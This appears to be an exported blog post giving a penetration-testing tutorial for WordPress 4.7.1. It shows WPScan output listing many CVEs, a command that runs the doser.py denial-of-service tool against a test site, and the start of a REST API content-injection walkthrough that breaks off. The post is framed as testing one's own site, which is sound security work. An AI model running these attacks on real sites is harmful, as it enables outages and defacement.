{"id":1853,"date":"2023-04-19T06:59:59","date_gmt":"2023-04-19T04:59:59","guid":{"rendered":"https:\/\/christeninformatica.ch\/?p=1853"},"modified":"2026-04-01T22:34:21","modified_gmt":"2026-04-01T20:34:21","slug":"hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit","status":"publish","type":"post","link":"https:\/\/christeninformatica.ch\/it\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/","title":{"rendered":"Hacking WordPress – Content Injection Exploit and DoS"},"content":{"rendered":"

This tutorial is intended for educational and instructional purposes only. Please do not use any of the techniques or tools described here to attempt to break into systems without proper authorization.<\/p>\n

This is a tutorial on how to exploit some vulnerabilities<\/b> present in the 4.7.1 version of WordPress, it is intended to give you an example on how to perform a penetration test on your own web-site\/blog. <\/p>\n

Finding WordPress Vulnerabilities using WPScan<\/h2>\n
\n
\n
workstation:\/home\/chit # wpscan --url http:\/\/chit-test.ch\nWARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.7\n_______________________________________________________________\n        __          _______   _____\n        \\ \\        \/ \/  __ \\ \/ ____|\n         \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n          \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n           \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n            \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n        WordPress Security Scanner by the WPScan Team\n                       Version 3.4.3\n          Sponsored by Sucuri - https:\/\/sucuri.net\n      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_\n_______________________________________________________________\n\n[i] It seems like you have not updated the database for some time.\n[?] Do you want to update now? [Y]es [N]o, default: [N]Y\n[i] Updating the Database ...\n[i] Update completed.\n\n[+] URL: http:\/\/chit-test.ch\/\n[+] Started: Wed May 22 18:07:18 2019\n\nInteresting Finding(s):\n\n[+] http:\/\/chit-test.ch\/\n | Interesting Entry: Server: Apache\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] WordPress version 4.7.1 identified (Insecure, released on 2017-01-11).\n | Detected By: Rss Generator (Passive Detection)\n |  - http:\/\/chit-test.ch\/?feed=rss2, https:\/\/wordpress.org\/?v=4.7.1\n |  - http:\/\/chit-test.ch\/?feed=comments-rss2, https:\/\/wordpress.org\/?v=4.7.1\n |\n | [!] 44 vulnerabilities identified:\n |\n | [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8729\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5610\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/21264a31e0849e6ff793a06a17de877dd88ea454\n |\n | [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8730\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5611\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/85384297a60900004e27e417eac56d24267054cb\n |\n | [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8731\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5612\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/4482f9207027de8f36630737ae085110896ea849\n |\n | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page\/Post Content Modification via REST API\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8734\n |      - https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\n |      - https:\/\/blogs.akamai.com\/2017\/02\/wordpress-web-api-vulnerability.html\n |      - https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e357195ce303017d517aff944644a7a1232926f7\n |      - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_content_injection\n |\n | [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8765\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6814\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html\n |      - http:\/\/seclists.org\/oss-sec\/2017\/q1\/563\n |\n | [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8766\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6815\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/288cd469396cfe7055972b457eb589cea51ce40e\n |\n | [!] Title: WordPress 4.7.0-4.7.2 - Authenticated Unintended File Deletion in Plugin Delete\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8767\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6816\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/4d80f8b3e1b00a3edcee0774dc9c2f4c78f9e663\n |\n | [!] Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8768\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6817\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8\n |      - https:\/\/blog.sucuri.net\/2017\/03\/stored-xss-in-wordpress-core.html\n |\n | [!] Title: WordPress 4.7-4.7.2 - Cross-Site Scripting (XSS) via Taxonomy Term Names\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8769\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6818\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/9092fd01e1f452f37c313d38b18f9fe6907541f9\n |\n | [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8770\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6819\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/263831a72d08556bc2f3a328673d95301a152829\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html\n |      - http:\/\/seclists.org\/oss-sec\/2017\/q1\/562\n |      - https:\/\/hackerone.com\/reports\/153093\n |\n | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8807\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-8295\n |      - https:\/\/exploitbox.io\/vuln\/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html\n |      - http:\/\/blog.dewhurstsecurity.com\/2017\/05\/04\/exploitbox-wordpress-security-advisories.html\n |      - https:\/\/core.trac.wordpress.org\/ticket\/25239\n |\n | [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8815\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9066\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/76d77e927bb4d0f87c7262a50e28d84e01fd2b11\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |\n | [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8816\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9062\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3d95e3ae816f4d7c638f40d3e936a4be19724381\n |\n | [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks \n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8817\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9065\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e88a48a066ab2200ce3091b131d43e2fab2460a4\n |\n | [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8818\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9064\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/38347d7c580be4cdd8476e4bbc653d5c79ed9b67\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/cross_site_request_forgery_in_wordpress_connection_information.html\n |\n | [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8819\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9061\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6\n |      - https:\/\/hackerone.com\/reports\/203515\n |      - https:\/\/hackerone.com\/reports\/203515\n |\n | [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8820\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9063\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3d10fef22d788f29aed745b0f5ff6f6baea69af3\n |\n | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8905\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/70b21279098fc973eae803693c0705a548128e48\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/fc930d3daed1c3acef010d04acc2c5de93cd18ec\n |\n | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8906\n |      - https:\/\/medium.com\/websec\/wordpress-sqli-bbb2afcc8e94\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/70b21279098fc973eae803693c0705a548128e48\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8905\n |\n | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8910\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14725\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41398\n |\n | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8911\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14719\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41457\n |\n | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer \n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8912\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14722\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41397\n |\n | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8913\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14724\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41448\n |\n | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8914\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14726\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41395\n |      - https:\/\/blog.sucuri.net\/2017\/09\/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html\n |\n | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness\n |     Fixed in: 4.7.7\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8941\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-16510\n |      - https:\/\/wordpress.org\/news\/2017\/10\/wordpress-4-8-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/a2693fd8602e3263b5925b9d799ddd577202167d\n |      - https:\/\/twitter.com\/ircmaxell\/status\/923662170092638208\n |      - https:\/\/blog.ircmaxell.com\/2017\/10\/disclosure-wordpress-wpdb-sql-injection-technical.html\n |\n | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8966\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17092\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/67d03a98c2cae5f41843c897f206adde299b0509\n |\n | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8967\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17094\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/f1de7e42df29395c3314bf85bff3d1f4f90541de\n |\n | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8968\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17093\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3713ac5ebc90fb2011e98dfd691420f43da6c09a\n |\n | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8969\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17091\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/eaf1cfdc1fe0bdffabd8d879c591b864d833326c\n |\n | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.9\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9006\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-5776\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3fe9cb61ee71fcfadb5e002399296fcc1198d850\n |      - https:\/\/wordpress.org\/news\/2018\/01\/wordpress-4-9-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/ticket\/42720\n |\n | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9021\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-6389\n |      - https:\/\/baraktawily.blogspot.fr\/2018\/02\/how-to-dos-29-of-world-wide-websites.html\n |      - https:\/\/github.com\/quitten\/doser.py\n |      - https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html\n |\n | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9053\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10101\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/804363859602d4050d9a38a21f5a65d9aec18216\n |\n | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9054\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10100\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/14bc2c0a6fde0da04b47130707e01df850eedc7e\n |\n | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9055\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10102\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/31a4369366d6b8ce30045d4c838de2412c77850d\n |\n | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion\n |     Fixed in: 4.7.11\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9100\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-12895\n |      - https:\/\/blog.ripstech.com\/2018\/wordpress-file-delete-to-code-execution\/\n |      - http:\/\/blog.vulnspy.com\/2018\/06\/27\/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/c9dce0606b0d7e6f494d4abe7b193ac046a322cd\n |      - https:\/\/wordpress.org\/news\/2018\/07\/wordpress-4-9-7-security-and-maintenance-release\/\n |      - https:\/\/www.wordfence.com\/blog\/2018\/07\/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7\/\n |\n | [!] Title: WordPress <= 5.0 - Authenticated File Delete\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9169\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20147\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9170\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20152\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/blog.ripstech.com\/2018\/wordpress-post-type-privilege-escalation\/\n |\n | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9171\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20148\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9172\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20153\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9173\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20150\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460\n |\n | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9174\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20151\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9175\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20149\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/246a70bdbfac3bd45ff71c7941deef1bb206b19a\n |\n | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution\n |     Fixed in: 5.0.1\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9222\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-8942\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-image-remote-code-execution\/\n |\n | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.13\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9230\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-9787\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/0292de60ec78c5a44956765189403654fe4d080b\n |      - https:\/\/wordpress.org\/news\/2019\/03\/wordpress-5-1-1-security-and-maintenance-release\/\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-csrf-to-rce\/\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2019-05-07T00:00:00.000Z\n | Readme: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] The version is out of date, the latest version is 2.2\n | Style URL: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.7.1\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Detected By: Css Style (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Detected By: Style (Passive Detection)\n |  - http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.7.1, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups\n Checking Config Backups - Time: 00:00:00 <====================================================> (21 \/ 21) 100.00% Time: 00:00:00\n\n[i] No Config Backups Found.\n\n[+] Finished: Wed May 22 18:07:21 2019\n[+] Requests Done: 70\n[+] Cached Requests: 4\n[+] Data Sent: 10.706 KB\n[+] Data Received: 23.486 MB\n[+] Memory used: 72.094 MB\n[+] Elapsed time: 00:00:02\nworkstation:\/home\/chit #\n\n<\/pre>\n<\/blockquote>\n<\/div>\n
As you can see from the output, WPScan detected 44 Vulnerabilities. We will take a look at some of them.<\/p>\n
WordPress Application Denial of Service (DoS)<\/h2>\n
This Vulnerability (CVE-2018-6389) found by WPScan allows the attacker to perform a \u201cWordPress Application Denial of Service (DoS)\u201d attack.<\/p>\n
\n
\n
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9021\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-6389\n |      - https:\/\/baraktawily.blogspot.fr\/2018\/02\/how-to-dos-29-of-world-wide-websites.html\n |      - https:\/\/github.com\/quitten\/doser.py\n |      - https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html\n<\/pre>\n<\/blockquote>\n<\/div>\n
“A simple yet serious application-level denial of service (DoS) vulnerability has been discovered in WordPress CMS platform that could allow anyone to take down most WordPress websites even with a single machine\u2014without hitting with a massive amount of bandwidth, as required in network-level DDoS attacks to achieve the same.”<\/p>\n
For more information about this WordPress vulnerability visit: https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html<\/a><\/p>\n
To test this attack we need to download doser.py from the following link: https:\/\/github.com\/quitten\/doser.py<\/a><\/p>\n
Once downloaded run:<\/p>\n
\n
\n
user@workstation:~\/Programmi\/doser.py-master> python doser.py -t 999 -g http:\/\/chit-test.ch\n<\/pre>\n<\/blockquote>\n<\/div>\n
\"WordPress<\/p>\n
Unauthenticated Page\/Post Content Modification via REST API<\/h2>\n
\n
\n
 | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page\/Post Content Modification via REST API\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8734\n |      - https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\n |      - https:\/\/blogs.akamai.com\/2017\/02\/wordpress-web-api-vulnerability.html\n |      - https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e357195ce303017d517aff944644a7a1232926f7\n |      - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_content_injection\n<\/pre>\n<\/blockquote>\n<\/div>\n
With this exploit (content injection)<\/b> is possible to modify the content of a specific site or article of a targeted WordPress<\/b> web-site\/blog.<\/p>\n
For more information about this vulnerability visit: https:\/\/blog.sucuri.net\/<\/a><\/p>\n
WordPress 4.7.0-1 Content Injection Exploit – Inject.py<\/h3>\n
To exploit this vulnerability we can use inject.py. Download Inject.py<\/a> and run it without arguments to have some information about its usage:<\/p>\n
\n
\n
